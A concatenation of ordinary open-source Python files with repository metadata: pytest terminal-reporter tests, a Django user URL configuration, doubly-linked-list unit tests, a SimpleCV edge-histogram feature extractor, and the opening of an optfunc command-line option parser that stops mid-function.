("1 passed", {"bold": False, "green": True}),
("1 xpassed", {"bold": True, "yellow": True}),
],
{"xpassed": [1], "passed": [1]},
),
# Likewise if no tests were found at all
("yellow", [("no tests ran", {"yellow": True})], {}),
# Test the empty-key special case
("yellow", [("no tests ran", {"yellow": True})], {"": [1]}),
(
"green",
[("1 passed", {"bold": True, "green": True})],
{"": [1], "passed": [1]},
),
# A couple more complex combinations
(
"red",
[
("1 failed", {"bold": True, "red": True}),
("2 passed", {"bold": False, "green": True}),
("3 xfailed", {"bold": False, "yellow": True}),
],
{"passed": [1, 2], "failed": [1], "xfailed": [1, 2, 3]},
),
(
"green",
[
("1 passed", {"bold": True, "green": True}),
("2 skipped", {"bold": False, "yellow": True}),
("3 deselected", {"bold": False, "yellow": True}),
("2 xfailed", {"bold": False, "yellow": True}),
],
{
"passed": [1],
"skipped": [1, 2],
"deselected": [1, 2, 3],
"xfailed": [1, 2],
},
),
],
)
def test_summary_stats(
tr: TerminalReporter,
exp_line: List[Tuple[str, Dict[str, bool]]],
exp_color: str,
stats_arg: Dict[str, List[object]],
) -> None:
tr.stats = stats_arg
# Fake "_is_last_item" to be True.
class fake_session:
testscollected = 0
tr._session = fake_session # type: ignore[assignment]
assert tr._is_last_item
# Reset cache.
tr._main_color = None
print("Based on stats: %s" % stats_arg)
print(f'Expect summary: "{exp_line}"; with color "{exp_color}"')
(line, color) = tr.build_summary_stats_line()
print(f'Actually got: "{line}"; with color "{color}"')
assert line == exp_line
assert color == exp_color
def test_skip_counting_towards_summary(tr):
class DummyReport(BaseReport):
count_towards_summary = True
r1 = DummyReport()
r2 = DummyReport()
tr.stats = {"failed": (r1, r2)}
tr._main_color = None
res = tr.build_summary_stats_line()
assert res == ([("2 failed", {"bold": True, "red": True})], "red")
r1.count_towards_summary = False
tr.stats = {"failed": (r1, r2)}
tr._main_color = None
res = tr.build_summary_stats_line()
assert res == ([("1 failed", {"bold": True, "red": True})], "red")
class TestClassicOutputStyle:
"""Ensure classic output style works as expected (#3883)"""
@pytest.fixture
def test_files(self, pytester: Pytester) -> None:
pytester.makepyfile(
**{
"test_one.py": "def test_one(): pass",
"test_two.py": "def test_two(): assert 0",
"sub/test_three.py": """
def test_three_1(): pass
def test_three_2(): assert 0
def test_three_3(): pass
""",
}
)
def test_normal_verbosity(self, pytester: Pytester, test_files) -> None:
result = pytester.runpytest("-o", "console_output_style=classic")
result.stdout.fnmatch_lines(
[
"test_one.py .",
"test_two.py F",
f"sub{os.sep}test_three.py .F.",
"*2 failed, 3 passed in*",
]
)
def test_verbose(self, pytester: Pytester, test_files) -> None:
result = pytester.runpytest("-o", "console_output_style=classic", "-v")
result.stdout.fnmatch_lines(
[
"test_one.py::test_one PASSED",
"test_two.py::test_two FAILED",
f"sub{os.sep}test_three.py::test_three_1 PASSED",
f"sub{os.sep}test_three.py::test_three_2 FAILED",
f"sub{os.sep}test_three.py::test_three_3 PASSED",
"*2 failed, 3 passed in*",
]
)
def test_quiet(self, pytester: Pytester, test_files) -> None:
result = pytester.runpytest("-o", "console_output_style=classic", "-q")
result.stdout.fnmatch_lines([".F.F.", "*2 failed, 3 passed in*"])
class TestProgressOutputStyle:
@pytest.fixture
def many_tests_files(self, pytester: Pytester) -> None:
pytester.makepyfile(
test_bar="""
import pytest
@pytest.mark.parametrize('i', range(10))
def test_bar(i): pass
""",
test_foo="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_foo(i): pass
""",
test_foobar="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_foobar(i): pass
""",
)
def test_zero_tests_collected(self, pytester: Pytester) -> None:
"""Some plugins (testmon for example) might issue pytest_runtest_logreport without any tests being
actually collected (#2971)."""
pytester.makeconftest(
"""
def pytest_collection_modifyitems(items, config):
from _pytest.runner import CollectReport
for node_id in ('nodeid1', 'nodeid2'):
rep = CollectReport(node_id, 'passed', None, None)
rep.when = 'passed'
rep.duration = 0.1
config.hook.pytest_runtest_logreport(report=rep)
"""
)
output = pytester.runpytest()
output.stdout.no_fnmatch_line("*ZeroDivisionError*")
output.stdout.fnmatch_lines(["=* 2 passed in *="])
def test_normal(self, many_tests_files, pytester: Pytester) -> None:
output = pytester.runpytest()
output.stdout.re_match_lines(
[
r"test_bar.py \.{10} \s+ \[ 50%\]",
r"test_foo.py \.{5} \s+ \[ 75%\]",
r"test_foobar.py \.{5} \s+ \[100%\]",
]
)
def test_colored_progress(
self, pytester: Pytester, monkeypatch, color_mapping
) -> None:
monkeypatch.setenv("PY_COLORS", "1")
pytester.makepyfile(
test_axfail="""
import pytest
@pytest.mark.xfail
def test_axfail(): assert 0
""",
test_bar="""
import pytest
@pytest.mark.parametrize('i', range(10))
def test_bar(i): pass
""",
test_foo="""
import pytest
import warnings
@pytest.mark.parametrize('i', range(5))
def test_foo(i):
warnings.warn(DeprecationWarning("collection"))
pass
""",
test_foobar="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_foobar(i): raise ValueError()
""",
)
result = pytester.runpytest()
result.stdout.re_match_lines(
color_mapping.format_for_rematch(
[
r"test_axfail.py {yellow}x{reset}{green} \s+ \[ 4%\]{reset}",
r"test_bar.py ({green}\.{reset}){{10}}{green} \s+ \[ 52%\]{reset}",
r"test_foo.py ({green}\.{reset}){{5}}{yellow} \s+ \[ 76%\]{reset}",
r"test_foobar.py ({red}F{reset}){{5}}{red} \s+ \[100%\]{reset}",
]
)
)
# Only xfail should have yellow progress indicator.
result = pytester.runpytest("test_axfail.py")
result.stdout.re_match_lines(
color_mapping.format_for_rematch(
[
r"test_axfail.py {yellow}x{reset}{yellow} \s+ \[100%\]{reset}",
r"^{yellow}=+ ({yellow}{bold}|{bold}{yellow})1 xfailed{reset}{yellow} in ",
]
)
)
def test_count(self, many_tests_files, pytester: Pytester) -> None:
pytester.makeini(
"""
[pytest]
console_output_style = count
"""
)
output = pytester.runpytest()
output.stdout.re_match_lines(
[
r"test_bar.py \.{10} \s+ \[10/20\]",
r"test_foo.py \.{5} \s+ \[15/20\]",
r"test_foobar.py \.{5} \s+ \[20/20\]",
]
)
def test_verbose(self, many_tests_files, pytester: Pytester) -> None:
output = pytester.runpytest("-v")
output.stdout.re_match_lines(
[
r"test_bar.py::test_bar\[0\] PASSED \s+ \[ 5%\]",
r"test_foo.py::test_foo\[4\] PASSED \s+ \[ 75%\]",
r"test_foobar.py::test_foobar\[4\] PASSED \s+ \[100%\]",
]
)
def test_verbose_count(self, many_tests_files, pytester: Pytester) -> None:
pytester.makeini(
"""
[pytest]
console_output_style = count
"""
)
output = pytester.runpytest("-v")
output.stdout.re_match_lines(
[
r"test_bar.py::test_bar\[0\] PASSED \s+ \[ 1/20\]",
r"test_foo.py::test_foo\[4\] PASSED \s+ \[15/20\]",
r"test_foobar.py::test_foobar\[4\] PASSED \s+ \[20/20\]",
]
)
def test_xdist_normal(
self, many_tests_files, pytester: Pytester, monkeypatch
) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
output = pytester.runpytest("-n2")
output.stdout.re_match_lines([r"\.{20} \s+ \[100%\]"])
def test_xdist_normal_count(
self, many_tests_files, pytester: Pytester, monkeypatch
) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
pytester.makeini(
"""
[pytest]
console_output_style = count
"""
)
output = pytester.runpytest("-n2")
output.stdout.re_match_lines([r"\.{20} \s+ \[20/20\]"])
def test_xdist_verbose(
self, many_tests_files, pytester: Pytester, monkeypatch
) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
output = pytester.runpytest("-n2", "-v")
output.stdout.re_match_lines_random(
[
r"\[gw\d\] \[\s*\d+%\] PASSED test_bar.py::test_bar\[1\]",
r"\[gw\d\] \[\s*\d+%\] PASSED test_foo.py::test_foo\[1\]",
r"\[gw\d\] \[\s*\d+%\] PASSED test_foobar.py::test_foobar\[1\]",
]
)
output.stdout.fnmatch_lines_random(
[
line.translate(TRANS_FNMATCH)
for line in [
"test_bar.py::test_bar[0] ",
"test_foo.py::test_foo[0] ",
"test_foobar.py::test_foobar[0] ",
"[gw?] [ 5%] PASSED test_*[?] ",
"[gw?] [ 10%] PASSED test_*[?] ",
"[gw?] [ 55%] PASSED test_*[?] ",
"[gw?] [ 60%] PASSED test_*[?] ",
"[gw?] [ 95%] PASSED test_*[?] ",
"[gw?] [100%] PASSED test_*[?] ",
]
]
)
def test_capture_no(self, many_tests_files, pytester: Pytester) -> None:
output = pytester.runpytest("-s")
output.stdout.re_match_lines(
[r"test_bar.py \.{10}", r"test_foo.py \.{5}", r"test_foobar.py \.{5}"]
)
output = pytester.runpytest("--capture=no")
output.stdout.no_fnmatch_line("*%]*")
class TestProgressWithTeardown:
"""Ensure we show the correct percentages for tests that fail during teardown (#3088)"""
@pytest.fixture
def contest_with_teardown_fixture(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""
import pytest
@pytest.fixture
def fail_teardown():
yield
assert False
"""
)
@pytest.fixture
def many_files(self, pytester: Pytester, contest_with_teardown_fixture) -> None:
pytester.makepyfile(
test_bar="""
import pytest
@pytest.mark.parametrize('i', range(5))
def test_bar(fail_teardown, i):
pass
""",
test_foo="""
import pytest
@pytest.mark.parametrize('i', range(15))
def test_foo(fail_teardown, i):
pass
""",
)
def test_teardown_simple(
self, pytester: Pytester, contest_with_teardown_fixture
) -> None:
pytester.makepyfile(
"""
def test_foo(fail_teardown):
pass
"""
)
output = pytester.runpytest()
output.stdout.re_match_lines([r"test_teardown_simple.py \.E\s+\[100%\]"])
def test_teardown_with_test_also_failing(
self, pytester: Pytester, contest_with_teardown_fixture
) -> None:
pytester.makepyfile(
"""
def test_foo(fail_teardown):
assert 0
"""
)
output = pytester.runpytest("-rfE")
output.stdout.re_match_lines(
[
r"test_teardown_with_test_also_failing.py FE\s+\[100%\]",
"FAILED test_teardown_with_test_also_failing.py::test_foo - assert 0",
"ERROR test_teardown_with_test_also_failing.py::test_foo - assert False",
]
)
def test_teardown_many(self, pytester: Pytester, many_files) -> None:
output = pytester.runpytest()
output.stdout.re_match_lines(
[r"test_bar.py (\.E){5}\s+\[ 25%\]", r"test_foo.py (\.E){15}\s+\[100%\]"]
)
def test_teardown_many_verbose(
self, pytester: Pytester, many_files, color_mapping
) -> None:
result = pytester.runpytest("-v")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
"test_bar.py::test_bar[0] PASSED * [ 5%]",
"test_bar.py::test_bar[0] ERROR * [ 5%]",
"test_bar.py::test_bar[4] PASSED * [ 25%]",
"test_foo.py::test_foo[14] PASSED * [100%]",
"test_foo.py::test_foo[14] ERROR * [100%]",
"=* 20 passed, 20 errors in *",
]
)
)
def test_xdist_normal(self, many_files, pytester: Pytester, monkeypatch) -> None:
pytest.importorskip("xdist")
monkeypatch.delenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", raising=False)
output = pytester.runpytest("-n2")
output.stdout.re_match_lines([r"[\.E]{40} \s+ \[100%\]"])
def test_skip_reasons_folding() -> None:
path = "xyz"
lineno = 3
message = "justso"
longrepr = (path, lineno, message)
class X:
pass
ev1 = cast(CollectReport, X())
ev1.when = "execute"
ev1.skipped = True # type: ignore[misc]
ev1.longrepr = longrepr
ev2 = cast(CollectReport, X())
ev2.when = "execute"
ev2.longrepr = longrepr
ev2.skipped = True # type: ignore[misc]
# ev3 might be a collection report
ev3 = cast(CollectReport, X())
ev3.when = "collect"
ev3.longrepr = longrepr
ev3.skipped = True # type: ignore[misc]
values = _folded_skips(Path.cwd(), [ev1, ev2, ev3])
assert len(values) == 1
num, fspath, lineno_, reason = values[0]
assert num == 3
assert fspath == path
assert lineno_ == lineno
assert reason == message
def test_line_with_reprcrash(monkeypatch: MonkeyPatch) -> None:
mocked_verbose_word = "FAILED"
mocked_pos = "some::nodeid"
def mock_get_pos(*args):
return mocked_pos
monkeypatch.setattr(_pytest.terminal, "_get_pos", mock_get_pos)
class config:
pass
class rep:
def _get_verbose_word(self, *args):
return mocked_verbose_word
class longrepr:
class reprcrash:
pass
def check(msg, width, expected):
__tracebackhide__ = True
if msg:
rep.longrepr.reprcrash.message = msg # type: ignore
actual = _get_line_with_reprcrash_message(config, rep(), width) # type: ignore
assert actual == expected
if actual != f"{mocked_verbose_word} {mocked_pos}":
assert len(actual) <= width
assert wcswidth(actual) <= width
# AttributeError with message
check(None, 80, "FAILED some::nodeid")
check("msg", 80, "FAILED some::nodeid - msg")
check("msg", 3, "FAILED some::nodeid")
check("msg", 24, "FAILED some::nodeid")
check("msg", 25, "FAILED some::nodeid - msg")
check("some longer msg", 24, "FAILED some::nodeid")
check("some longer msg", 25, "FAILED some::nodeid - ...")
check("some longer msg", 26, "FAILED some::nodeid - s...")
check("some\nmessage", 25, "FAILED some::nodeid - ...")
check("some\nmessage", 26, "FAILED some::nodeid - some")
check("some\nmessage", 80, "FAILED some::nodeid - some")
# Test unicode safety.
check("🉐🉐🉐🉐🉐\n2nd line", 25, "FAILED some::nodeid - ...")
check("🉐🉐🉐🉐🉐\n2nd line", 26, "FAILED some::nodeid - ...")
check("🉐🉐🉐🉐🉐\n2nd line", 27, "FAILED some::nodeid - 🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 28, "FAILED some::nodeid - 🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 29, "FAILED some::nodeid - 🉐🉐...")
# NOTE: constructed, not sure if this is supported.
mocked_pos = "nodeid::🉐::withunicode"
check("🉐🉐🉐🉐🉐\n2nd line", 29, "FAILED nodeid::🉐::withunicode")
check("🉐🉐🉐🉐🉐\n2nd line", 40, "FAILED nodeid::🉐::withunicode - 🉐🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 41, "FAILED nodeid::🉐::withunicode - 🉐🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 42, "FAILED nodeid::🉐::withunicode - 🉐🉐🉐...")
check("🉐🉐🉐🉐🉐\n2nd line", 80, "FAILED nodeid::🉐::withunicode - 🉐🉐🉐🉐🉐")
@pytest.mark.parametrize(
"seconds, expected",
[
(10.0, "10.00s"),
(10.34, "10.34s"),
(59.99, "59.99s"),
(60.55, "60.55s (0:01:00)"),
(123.55, "123.55s (0:02:03)"),
(60 * 60 + 0.5, "3600.50s (1:00:00)"),
],
)
def test_format_session_duration(seconds, expected):
from _pytest.terminal import format_session_duration
assert format_session_duration(seconds) == expected
def test_collecterror(pytester: Pytester) -> None:
p1 = pytester.makepyfile("raise SyntaxError()")
result = pytester.runpytest("-ra", str(p1))
result.stdout.fnmatch_lines(
[
"collected 0 items / 1 error",
"*= ERRORS =*",
"*_ ERROR collecting test_collecterror.py _*",
"E SyntaxError: *",
"*= short test summary info =*",
"ERROR test_collecterror.py",
"*! Interrupted: 1 error during collection !*",
"*= 1 error in *",
]
)
def test_no_summary_collecterror(pytester: Pytester) -> None:
p1 = pytester.makepyfile("raise SyntaxError()")
result = pytester.runpytest("-ra", "--no-summary", str(p1))
result.stdout.no_fnmatch_line("*= ERRORS =*")
def test_via_exec(pytester: Pytester) -> None:
p1 = pytester.makepyfile("exec('def test_via_exec(): pass')")
result = pytester.runpytest(str(p1), "-vv")
result.stdout.fnmatch_lines(
["test_via_exec.py::test_via_exec <- <string> PASSED*", "*= 1 passed in *"]
)
class TestCodeHighlight:
def test_code_highlight_simple(self, pytester: Pytester, color_mapping) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
result = pytester.runpytest("--color=yes")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
" {kw}def{hl-reset} {function}test_foo{hl-reset}():",
"> {kw}assert{hl-reset} {number}1{hl-reset} == {number}10{hl-reset}",
"{bold}{red}E assert 1 == 10{reset}",
]
)
)
def test_code_highlight_continuation(
self, pytester: Pytester, color_mapping
) -> None:
pytester.makepyfile(
"""
def test_foo():
print('''
'''); assert 0
"""
)
result = pytester.runpytest("--color=yes")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
" {kw}def{hl-reset} {function}test_foo{hl-reset}():",
" {print}print{hl-reset}({str}'''{hl-reset}{str}{hl-reset}",
"> {str} {hl-reset}{str}'''{hl-reset}); {kw}assert{hl-reset} {number}0{hl-reset}",
"{bold}{red}E assert 0{reset}",
]
)
)
def test_code_highlight_custom_theme(
self, pytester: Pytester, color_mapping, monkeypatch: MonkeyPatch
) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
monkeypatch.setenv("PYTEST_THEME", "solarized-dark")
monkeypatch.setenv("PYTEST_THEME_MODE", "dark")
result = pytester.runpytest("--color=yes")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(
[
" {kw}def{hl-reset} {function}test_foo{hl-reset}():",
"> {kw}assert{hl-reset} {number}1{hl-reset} == {number}10{hl-reset}",
"{bold}{red}E assert 1 == 10{reset}",
]
)
)
def test_code_highlight_invalid_theme(
self, pytester: Pytester, color_mapping, monkeypatch: MonkeyPatch
) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
monkeypatch.setenv("PYTEST_THEME", "invalid")
result = pytester.runpytest_subprocess("--color=yes")
result.stderr.fnmatch_lines(
"ERROR: PYTEST_THEME environment variable had an invalid value: 'invalid'. "
"Only valid pygment styles are allowed."
)
def test_code_highlight_invalid_theme_mode(
self, pytester: Pytester, color_mapping, monkeypatch: MonkeyPatch
) -> None:
pytester.makepyfile(
"""
def test_foo():
assert 1 == 10
"""
)
monkeypatch.setenv("PYTEST_THEME_MODE", "invalid")
result = pytester.runpytest_subprocess("--color=yes")
result.stderr.fnmatch_lines(
"ERROR: PYTEST_THEME_MODE environment variable had an invalid value: 'invalid'. "
"The only allowed values are 'dark' and 'light'."
)
def test_raw_skip_reason_skipped() -> None:
report = SimpleNamespace()
report.skipped = True
report.longrepr = ("xyz", 3, "Skipped: Just so")
reason = _get_raw_skip_reason(cast(TestReport, report))
assert reason == "Just so"
def test_raw_skip_reason_xfail() -> None:
report = SimpleNamespace()
report.wasxfail = "reason: To everything there is a season"
reason = _get_raw_skip_reason(cast(TestReport, report))
assert reason == "To everything there is a season"
def test_format_trimmed() -> None:
msg = "unconditional skip"
assert _format_trimmed(" ({}) ", msg, len(msg) + 4) == " (unconditional skip) "
assert _format_trimmed(" ({}) ", msg, len(msg) + 3) == " (unconditional ...) "
| {
"content_hash": "4dae1bd7460c5b9a9f49a1b2448f989b",
"timestamp": "",
"source": "github",
"line_count": 2545,
"max_line_length": 107,
"avg_line_length": 33.17996070726915,
"alnum_prop": 0.509763982804969,
"repo_name": "Akasurde/pytest",
"id": "f0e58e5b4c4a0023c7c01ccc7e75d2063c75bc6a",
"size": "84665",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "testing/test_terminal.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "192"
},
{
"name": "Python",
"bytes": "2594260"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from bizsprint.users import views
urlpatterns = [
# URL pattern for the UserListView
url(
regex=r'^$',
view=views.UserListView.as_view(),
name='list'
),
# URL pattern for the UserRedirectView
url(
regex=r'^~redirect/$',
view=views.UserRedirectView.as_view(),
name='redirect'
),
# URL pattern for the UserDetailView
url(
regex=r'^(?P<username>[\w.@+-]+)/$',
view=views.UserDetailView.as_view(),
name='detail'
),
# URL pattern for the UserUpdateView
url(
regex=r'^~update/$',
view=views.UserUpdateView.as_view(),
name='update'
),
]
| {
"content_hash": "fd58cb3878c249649a01229e18c73382",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 56,
"avg_line_length": 22,
"alnum_prop": 0.5818181818181818,
"repo_name": "DJMedhaug/BizSprint",
"id": "0fa24403e3e6a39879862660b0369e3296ec2ce0",
"size": "794",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bizsprint/users/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1242519"
},
{
"name": "HTML",
"bytes": "250009"
},
{
"name": "JavaScript",
"bytes": "965426"
},
{
"name": "PHP",
"bytes": "390755"
},
{
"name": "Python",
"bytes": "129777"
},
{
"name": "Shell",
"bytes": "3675"
}
],
"symlink_target": ""
} |
"""Testing dll.py."""
import pytest
from data_structures.dll import DoublyLinkedList, DoubleNode
@pytest.fixture
def new_dll():
"""Return empty dll."""
return DoublyLinkedList()
@pytest.fixture
def init_dll():
"""Return non empty dll."""
dll = DoublyLinkedList()
dll.push(1)
dll.push(2)
dll.push(3)
return dll
def test_init(new_dll):
"""Test initialization of empty doubly linked list."""
assert new_dll.head is None and new_dll.tail is None
def test_push_to_empty(new_dll):
"""Test push to empty dll."""
new_dll.push(21)
assert new_dll.head.val == 21 and new_dll.head.next is None
def test_new_node(new_dll):
"""Test if new node is created."""
node = DoubleNode(27)
assert node.prev is None and node.next is None and node.val == 27
def test_new_node_optional(new_dll):
"""Testing optional parameters on the newly created node."""
node2 = DoubleNode(10)
node3 = DoubleNode(11)
node1 = DoubleNode(17, node2, node3)
assert node1.prev is node2 and node1.next is node3
def test_append(new_dll):
"""Testing the append function to add to the tail of the node."""
new_dll.append('11')
assert new_dll.tail.val == "11"
def test_append_to_non_empty(new_dll):
"""Testing append to Node with value."""
new_dll.append(3)
new_dll.append(2)
new_dll.append(1)
assert new_dll.tail.val == 1
assert new_dll.tail.prev.val == 2
assert new_dll.tail.prev.next.val == 1
assert new_dll.tail.prev.prev.val == 3
def test_pop_empty(new_dll):
"""Test to pop the head off from the node and return it."""
with pytest.raises(IndexError):
new_dll.pop()
def test_pop_length_one(new_dll):
"""Test pop on dll of length one."""
new_dll.push(42)
new_dll.pop()
assert new_dll.head is None and new_dll.tail is None
def test_pop_length_one_return_val(new_dll):
"""Test pop return value."""
new_dll.push(42)
assert new_dll.pop() == 42
def test_push_twice(new_dll):
"""Test ability to push more than once."""
new_dll.push("brandy")
new_dll.push("chardonnay")
assert new_dll.head.val == "chardonnay" and new_dll.tail.val == "brandy"
def test_push_multiple(init_dll):
"""Test ability to push more than once."""
assert init_dll.head.val == 3
assert init_dll.head.next.val == 2
assert init_dll.head.next.next.val == init_dll.tail.val
def test_shift_from_empty(new_dll):
"""Test shift from empty raises exception."""
with pytest.raises(IndexError):
new_dll.shift()
def test_shift_on_one_long(new_dll):
"""Test shift on dll with length of one."""
new_dll.push("spaghetti")
new_dll.shift()
assert new_dll.head is None and new_dll.tail is None
def test_shift_on_two_long(new_dll):
"""Test shift on dll with length of two."""
new_dll.push(3)
new_dll.push(4)
new_dll.shift()
assert new_dll.head.val == 4
assert new_dll.tail is new_dll.head
def test_shift_on_more_than_two_long(init_dll):
"""Test shift on dll longer than one."""
init_dll.shift()
assert init_dll.tail.val == 2 and init_dll.head.val == 3
def test_shift_tail_next_is_none(init_dll):
"""Test shift sets tail.next to None."""
init_dll.shift()
assert init_dll.tail.next is None
def test_remove(init_dll):
"""Remove node from dll."""
init_dll.remove(2)
assert init_dll.head.next.val == 1
assert init_dll.tail.prev.val == 3
def test_remove_empty(new_dll):
"""Test remove will raise exception."""
with pytest.raises(IndexError):
new_dll.remove("the answer is")
def test_remove_length_one(new_dll):
"""Test remove on dll with length of one."""
new_dll.push("heydo")
new_dll.remove("heydo")
assert new_dll.head is None and new_dll.tail is None
def test_remove_not_in_list(init_dll):
"""Test remove raises exception if value to be removed is not in list."""
with pytest.raises(ValueError):
init_dll.remove(42)
def test_remove_head(init_dll):
"""Test remove on first node."""
init_dll.remove(3)
assert init_dll.head.val == 2 and init_dll.head.prev is None
def test_remove_tail(init_dll):
"""Test remove on last node."""
init_dll.remove(1)
assert init_dll.tail.val == 2
assert init_dll.tail.next is None
assert init_dll.tail.prev is init_dll.head
def test_pop_off(init_dll):
"""Testing to see if head equals none when popped."""
init_dll.pop()
assert init_dll.head.prev is None
def test_invalid_iterable_constructor_parameter():
"""Test error is raised if invalid iterable is passed as arg to init."""
with pytest.raises(ValueError):
DoublyLinkedList(34)
| {
"content_hash": "7fc5aa0894586c0f006f9b37211cf461",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 77,
"avg_line_length": 25.917582417582416,
"alnum_prop": 0.6533813864744541,
"repo_name": "fordf/data-structures",
"id": "9dd12d4dd533b90931a1f1db907bf33cdfb738be",
"size": "4717",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_dll.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "112611"
}
],
"symlink_target": ""
} |
from SimpleCV.base import *
from SimpleCV.ImageClass import Image
from SimpleCV.Features.FeatureExtractorBase import *
class EdgeHistogramFeatureExtractor(FeatureExtractorBase):
"""
Create a 1D edge length histogram and 1D edge angle histogram.
This method takes in an image, applies an edge detector, and calculates
the length and direction of lines in the image.
bins = the number of bins
"""
mNBins = 10
def __init__(self, bins=10):
self.mNBins = bins
def extract(self, img):
"""
Extract the line orientation and and length histogram.
"""
#I am not sure this is the best normalization constant.
retVal = []
p = max(img.width,img.height)/2
minLine = 0.01*p
gap = 0.1*p
fs = img.findLines(threshold=10,minlinelength=minLine,maxlinegap=gap)
ls = fs.length()/p #normalize to image length
angs = fs.angle()
lhist = np.histogram(ls,self.mNBins,normed=True,range=(0,1))
ahist = np.histogram(angs,self.mNBins,normed=True,range=(-180,180))
retVal.extend(lhist[0].tolist())
retVal.extend(ahist[0].tolist())
return retVal
def getFieldNames(self):
"""
Return the names of all of the length and angle fields.
"""
retVal = []
for i in range(self.mNBins):
name = "Length"+str(i)
retVal.append(name)
for i in range(self.mNBins):
name = "Angle"+str(i)
retVal.append(name)
return retVal
"""
This method gives the names of each field in the feature vector in the
order in which they are returned. For example, 'xpos' or 'width'
"""
def getNumFields(self):
"""
This method returns the total number of fields in the feature vector.
"""
return self.mNBins*2
| {
"content_hash": "c828654f417292df57c39cfad0f2ce5a",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 78,
"avg_line_length": 31.225806451612904,
"alnum_prop": 0.5945247933884298,
"repo_name": "intelie/pycollector",
"id": "2acc5979a4794f8e11ba63f1c6e96efda2ed08ca",
"size": "1936",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/third/SimpleCV/Features/EdgeHistogramFeatureExtractor.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "30766"
},
{
"name": "CSS",
"bytes": "17"
},
{
"name": "Perl",
"bytes": "1832"
},
{
"name": "Python",
"bytes": "5233411"
},
{
"name": "R",
"bytes": "333"
},
{
"name": "Shell",
"bytes": "2065"
}
],
"symlink_target": ""
} |
"""
example:
import optfunc
@optfunc.arghelp('rest_','input files')
def main(rest_=['-'],keyfields=1,sep='\t',usage_='-h usage'):
"-h usage" # optional: usage_ arg instead
pass
"""
from optparse import OptionParser, make_option
import sys, inspect, re
doc_name='usage_'
rest_name='rest_' # remaining positional arguments into this function arg as list
single_char_prefix_re = re.compile('^[a-zA-Z0-9]_')
# Set this to any message you want to be printed
# before the standard help
# This could include application name, description
header = 'usage: %s COMMAND [ARGS]\n\nThe available commands are:' % sys.argv[0]
# non-standard separator to use
subcommand_sep = '\n'
class ErrorCollectingOptionParser(OptionParser):
def __init__(self, *args, **kwargs):
self._errors = []
self._custom_names = {}
# can't use super() because OptionParser is an old style class
OptionParser.__init__(self, *args, **kwargs)
def parse_args(self, argv):
options, args = OptionParser.parse_args(self, argv)
for k,v in options.__dict__.iteritems():
if k in self._custom_names:
options.__dict__[self._custom_names[k]] = v
del options.__dict__[k]
return options, args
def error(self, msg):
self._errors.append(msg)
optypes=[int,long,float,complex] # not type='choice' choices='a|b'
def optype(t):
if t is bool:
return None
if t in optypes:
return t
return "string"
def func_to_optionparser(func):
args, varargs, varkw, defaultvals = inspect.getargspec(func)
defaultvals = defaultvals or ()
options = dict(zip(args[-len(defaultvals):], defaultvals))
helpdict = getattr(func, 'optfunc_arghelp', {})
def defaulthelp(examples):
return ' (default: %s)'%examples
posargshelp='\n\t(positional args):\t%s%s'% (
helpdict.get(rest_name,''),
defaulthelp(options[rest_name])) if rest_name in options else ''
options.pop(rest_name, None)
ds=func.__doc__
if ds is None:
ds=''
if doc_name in options:
ds+=str(options[doc_name])
options.pop(doc_name)
argstart = 0
if func.__name__ == '__init__':
argstart = 1
if defaultvals:
required_args = args[argstart:-len(defaultvals)]
else:
required_args = args[argstart:]
args = filter( lambda x: x != rest_name, args )
# Build the OptionParser:
opt = ErrorCollectingOptionParser(usage = ds+posargshelp)
# Add the options, automatically detecting their -short and --long names
shortnames = set(['h'])
for name,_ in options.items():
if single_char_prefix_re.match(name):
shortnames.add(name[0])
for argname, example in options.items():
# They either explicitly set the short with x_blah...
name = argname
if single_char_prefix_re.match(name):
short = name[0]
name = name[2:]
opt._custom_names[name] = argname
# Or we pick the first letter from the name not already in use:
else:
short=None
for s in name:
if s not in shortnames:
short=s
break
names=[]
if short is not None:
shortnames.add(short)
short_name = '-%s' % short
names.append(short_name)
longn=name.replace('_', '-')
long_name = '--%s' % longn
names.append(long_name)
if isinstance(example, bool):
no_name='--no%s'%longn
opt.add_option(make_option(
no_name, action='store_false', dest=name,help = helpdict.get(argname, 'unset %s'%long_name)
))
action = 'store_true'
else:
action = 'store'
examples=str(example)
if isinstance(example, int):
if example==sys.maxint: examples="INFINITY"
if example==(-sys.maxint-1): examples="-INFINITY"
help_post=defaulthelp(examples)
kwargs=dict(action=action, dest=name, default=example,
help = helpdict.get(argname, '')+help_post,
type=optype(type(example)))
opt.add_option(make_option(*names,**kwargs))
